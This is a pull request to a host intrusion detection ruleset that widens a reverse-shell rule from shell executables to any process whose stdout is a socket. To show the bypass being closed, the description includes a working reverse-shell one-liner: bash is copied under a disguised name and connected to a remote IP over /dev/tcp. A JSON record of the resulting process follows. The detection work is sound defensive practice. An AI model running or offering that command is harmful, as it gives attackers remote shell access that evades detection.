### PR TITLE
判断所有程序的stdin,stdout重定向，避免被绕过

### DIFF
--- a/config/elkeid_hids/ruleset/detection.xml
+++ b/config/elkeid_hids/ruleset/detection.xml
@@ -140,9 +140,6 @@
         <desc kill_chain_id="persistent" affected_target="host_process">Reverse Shell With Connection</desc>
         <filter part="data_type">59</filter>
         <check_list>
-            <check_node type="REGEX" part="exe">
-                <![CDATA[(?:\b[a-r|t-z]*sh\b|\bksh93\b)]]>
-            </check_node>
             <check_node type="REGEX" part="stdout">
                 <![CDATA[(?:\bsocket\b)]]>
             </check_node>


### PR DESCRIPTION
判断所有程序的stdin,stdout重定向，避免被绕过

cp /bin/bash /tmp/apache;/tmp/apache -i >& /dev/tcp/10.71.5.222/666 0>&1

{
            "bootTime":"2022-01-19 18:48:20.000",
            "cmdline":"/tmp/apache -i",
            "cwd":"/",
            "exe":"/tmp/apache",
            "fd_num":"3",
            "name":"apache",
            "pid":"88184",
            "ppid":"50250",
            "r_addr_ip":"10.71.5.222",
            "r_addr_port":"666",
            "session":"50250",
            "stderr":"socket:[583190616]",
            "stdin":"socket:[583190616]",
            "stdout":"socket:[583190616]",
            "terminal":"/pts/0",
            "username":"root"
        },